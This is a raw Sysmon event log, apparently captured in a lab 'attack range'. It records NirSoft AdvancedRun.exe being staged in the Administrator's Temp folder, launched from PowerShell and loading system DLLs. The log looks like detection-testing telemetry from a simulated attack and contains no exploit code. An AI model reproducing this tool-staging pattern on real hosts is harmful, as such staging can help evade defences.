OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007617Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.988{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007604Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007603Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007602Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007601Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007600Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007599Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007598Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007597Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007596Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007595Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007594Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007593Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=F3B7F231407DD207CABC94C9347984AC,SHA256=053A1D95EEB426416278D2AD7D584FDD984A8B445CC88B46785AB8666383FB0BtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007592Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\KernelBase.dll10.0.14393.4886 (rs1_release.220104-1735)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=4AA859ECE1E241F213E977FB1FC58E4F,SHA256=E6E772658EFC1276B673EA096F76B1ED8E0013C9DD81FEBA76C042E08FA6AC31trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007591Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007590Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64cpu.dll10.0.14393.3503 (rs1_release.200131-0410)AMD64 Wow64 CPU Microsoft® Windows® Operating SystemMicrosoft Corporationwow64cpu.dllMD5=C1F2078639481364EA3FDD10CBEB1A18,SHA256=B63E6DC0B3D7ABA9CB95929A1A360208A570CB2072474276F649B68F1AC8DC82trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007589Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007588Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007587Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=B7507287901F3605BC754109D6EA1B04,SHA256=7E2697685399C687ABB501AE3A6F19EAA50E5C0457F8FEFAC87C05F0C0F31DB1trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007586Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\kernel32.dll10.0.14393.4651 (rs1_release.210911-1554)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=0AAB61CE538011C286B367815A98E5EE,SHA256=C5895455873186AA467ECC9DBF9C2F73A0AEC5CF5E1357C0700D88D20DE2412FtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007585Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64win.dll10.0.14393.3383 (rs1_release.191125-1816)Wow64 Console and Win32 API LoggingMicrosoft® Windows® Operating SystemMicrosoft Corporationwow64lg2.dllMD5=62DEBA17D0A26B352F1C3F02144BC6EA,SHA256=5A1C08FE318942CB31048DBD641E25610DE842E34470B3E54FEDCA4E2642D4E0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007584Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\wow64.dll10.0.14393.3503 (rs1_release.200131-0410)Win32 Emulation on NT64Microsoft® Windows® Operating SystemMicrosoft Corporationwow64.dllMD5=447615F19DAAFF9C308370C59F493BF8,SHA256=45ED2009CEEB249BBF518B958AF02B97E667DB68C9B6D65642E69E9B0300CF5DtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007583Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F77A39FFEEFDA237A5730A71A2EB3B83,SHA256=A4D72013A219DA259858A19C3A2807FF88C1E874621AEF666D05C65E9257C9B3trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007582Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\System32\ntdll.dll10.0.14393.4886 (rs1_release.220104-1735)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F0A74A939E7B2E1C0B392CEB2D3EB71B,SHA256=CD6382FF8FDEF8C08C62576D80C981E6E1C966E95874007EFE047BD136BF954CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000004007581Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exeMD5=2F06A497BACD1F270363B22A3498BDC2,SHA256=8EF8957A60BC02849E0CDE21278C7432F4782E27559CEECE306FEF2CDA70CEE8trueNir SoferValidATTACKRANGE\Administrator 10341000x80000000000000004007580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.972{834264DD-DAF8-61EA-5B00-000000002702}41005552C:\Windows\system32\csrss.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179fNT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004007579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.957{834264DD-E497-61EA-F301-000000002702}9444688C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+15c0099|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a0009f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a63b11|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a45b20|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a459b1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a366d1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43c13|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a43785|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a434f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a4312d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+150b45b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a283d8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\af2648a1dba4410c1e087d65f92c9e05\System.Management.Automation.ni.dll+a2794aATTACKRANGE\AdministratorATTACKRANGE\Administrator 154100x80000000000000004007578Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:39:52.967{834264DD-FDF8-61EA-A505-000000002702}4124C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe1.50Run a program with different settings that you choose.AdvancedRunNirSoftAdvancedRun.exe"C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe" /cfg 